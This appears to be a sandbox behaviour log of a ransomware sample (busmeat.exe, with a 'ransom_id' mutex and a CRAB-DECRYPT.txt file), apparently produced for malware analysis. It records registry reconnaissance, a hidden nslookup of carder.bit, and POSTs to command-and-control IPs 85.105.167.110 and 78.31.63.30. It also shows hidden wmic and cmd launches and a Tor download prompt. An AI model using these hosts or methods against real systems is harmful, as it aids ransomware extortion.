Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
Window Create window_name = aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaỹ矈, class_name = MyExtraWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 3
Fn
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = MyMainWnd, index = 18446744073709551600, new_long = 1421869056 True 1
Fn
System Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Thread 0xf88
2 0
»
Category Operation Information Success Count Logfile
Window Create class_name = MyMainWnd, wndproc_parameter = 0 True 1
Fn
System Sleep duration = 50 milliseconds (0.050 seconds) True 1
Fn
Thread 0xf98
90 35
»
Category Operation Information Success Count Logfile
System Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Mutex Create mutex_name = Global\pc_group=WORKGROUP&ransom_id=dce1bb8bd2ca4def True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
System Get Time type = Ticks, time = 160125 True 1
Fn
System Get Computer Name result_out = LHNIWSJ True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Control Panel\International True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Control Panel\International, value_name = LocaleName, data = 101 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 1, data = 48 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Keyboard Layout\Preload, value_name = 2, data = 48 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion, value_name = productName, data = 87 True 1
Fn
System Get Info type = Hardware Information True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = ipv4bot.whatismyipaddress.com, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = ipv4bot.whatismyipaddress.com/ True 1
Fn
Inet Read Response size = 10238, size_out = 14 True 1
Fn
Data
Inet Read Response size = 10238, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Filename process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, size = 256 True 1
Fn
File Create filename = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
File Get Info filename = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, type = size True 1
Fn
File Read filename = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, size = 237065, size_out = 237065 True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0x950, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read size = 4096, size_out = 308 True 1
Fn
Data
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 85.105.167.110, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = aysseaf?s=oast, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 85.105.167.110/aysseaf?s=oast True 1
Fn
Data
Inet Read Response size = 204798, size_out = 552 True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Inet Close Session - True 1
Fn
System Get Time type = Ticks, time = 167890 True 1
Fn
System Sleep duration = -1 (infinite) True 1
Fn
System Get Time type = Ticks, time = 214531 True 2
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Tcpip\Parameters, value_name = Domain, data = 0 True 1
Fn
System Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = ProcessorNameString, data = 73 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0, value_name = Identifier, data = 73 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ntdll.dll, base_address = 0x77c40000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = RtlComputeCrc32, address_out = 0x77c66b10 True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
File Create Pipe pipe_name = Anonymous read pipe, size = 0 True 1
Fn
Process Create process_name = nslookup carder.bit ns1.wowservers.ru, os_pid = 0xb10, startup_flags = STARTF_USESHOWWINDOW, STARTF_USESTDHANDLES, show_window = SW_HIDE True 1
Fn
File Read filename = C:\\CRAB-DECRYPT.txt, size = 4096, size_out = 308 True 1
Fn
Inet Close Session - True 1
Fn
Inet Open Session user_agent = Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Inet Open Connection protocol = HTTP, server_name = 78.31.63.30, server_port = 80 True 1
Fn
Inet Open HTTP Request http_verb = POST, http_version = HTTP/1.1, target_resource = oaza?erb=scaugh&eigh=ai, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Inet Add HTTP Request Headers headers = Host: carder.bit True 1
Fn
Inet Send HTTP Request headers = Content-Type: application/x-www-form-urlencoded, url = 78.31.63.30/oaza?erb=scaugh&eigh=ai True 1
Fn
Data
Inet Read Response size = 204798, size_out = 0 True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Inet Close Session - True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x779af8d0 True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Process Create process_name = C:\Windows\system32\wbem\wmic.exe, show_window = SW_HIDE True 1
Fn
Module Get Filename process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, size = 256 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\advapi32.dll, base_address = 0x77990000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CheckTokenMembership, address_out = 0x779af8d0 True 1
Fn
System Get Time type = Ticks, time = 221546 True 1
Fn
System Get Time type = Ticks, time = 223265 True 1
Fn
File Create filename = C:\Users\CIIHMN~1\AppData\Local\Temp\\pidor.bmp, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
File Write filename = C:\Users\CIIHMN~1\AppData\Local\Temp\\pidor.bmp, size = 14 True 1
Fn
File Write filename = C:\Users\CIIHMN~1\AppData\Local\Temp\\pidor.bmp, size = 40 True 1
Fn
File Write filename = C:\Users\CIIHMN~1\AppData\Local\Temp\\pidor.bmp, size = 5184000 True 1
Fn
Module Get Filename process_name = c:\users\ciihmn~1\appdata\local\temp\busmeat.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\busmeat.exe, size = 256 True 1
Fn
Process Create process_name = cmd.exe, show_window = SW_HIDE True 1
Fn
Process Create process_name = https://www.torproject.org/download/download-easy.html.en, show_window = SW_SHOW False 1
Fn
Thread 0xff4
544 0
»
Category Operation Information Success Count Logfile
Driver Enumerate load_addresses = 1703688 True 1
Fn
Driver Enumerate load_addresses = 14942208 True 1
Fn
Driver Get Name load_address = 3250606080 True 1
Fn
Driver Get Name load_address = 3259330560 True 1
Fn
Driver Get Name load_address = 3235078144 True 1
Fn
Driver Get Name load_address = 3872587776 True 1
Fn
Driver Get Name load_address = 3873177600 True 1
Fn
Driver Get Name load_address = 3856662528 True 1
Fn
Driver Get Name load_address = 3857121280 True 1
Fn
Driver Get Name load_address = 3857317888 True 1
Fn
Driver Get Name load_address = 3857448960 True 1
Fn
Driver Get Name load_address = 3857514496 True 1
Fn
Driver Get Name load_address = 3857580032 True 1
Fn
Driver Get Name load_address = 3857645568 True 1
Fn
Driver Get Name load_address = 3858300928 True 1
Fn
